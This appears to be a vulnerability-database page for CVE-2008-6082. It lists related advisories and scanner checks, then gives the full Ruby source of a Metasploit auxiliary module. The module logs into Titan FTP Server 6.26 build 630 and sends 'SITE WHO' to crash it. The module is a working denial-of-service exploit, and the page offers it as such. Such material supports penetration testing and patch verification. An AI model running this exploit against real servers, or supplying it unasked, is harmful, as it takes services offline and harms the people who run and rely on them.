| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Titan FTP Server < 6.26 Build 631 SITE WHO Command DoS | 21 Oct 200800:00 | – | nessus | |
| Titan FTP Server SITE WHO Command Resource Consumption DoS | 16 Oct 200800:00 | – | nessus | |
| CVE-2008-6082 | 14 Oct 200800:00 | – | circl | |
| CVE-2008-6082 | 6 Feb 200911:00 | – | cve | |
| CVE-2008-6082 | 6 Feb 200911:00 | – | cvelist | |
| Titan FTP Server 6.26.630 SITE WHO DoS | 9 Jan 200905:33 | – | metasploit | |
| CVE-2008-6082 | 6 Feb 200911:30 | – | nvd | |
| TitanFTP Server < 6.26.631 DoS Vulnerability | 11 Feb 200900:00 | – | openvas | |
| Titan FTP Server < 6.26.631 Remote DoS Vulnerability | 23 Oct 200800:00 | – | openvas | |
| TitanFTP Server Denial of Service Vulnerability | 11 Feb 200900:00 | – | openvas |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Titan FTP Server 6.26.630 SITE WHO DoS',
'Description' => %q{
The Titan FTP server v6.26 build 630 can be DoS'd by
issuing "SITE WHO". You need a valid login so you
can send this command.
},
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2008-6082'],
[ 'OSVDB', '49177'],
[ 'EDB', '6753']
],
'DisclosureDate' => '2008-10-14'))
# They're required
register_options([
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ], fallbacks: ['USERNAME']),
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ], fallbacks: ['PASSWORD'])
])
end
def run
return unless connect_login
print_status("Sending command...")
raw_send("SITE WHO\r\n")
select(nil,nil,nil,1)
disconnect
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation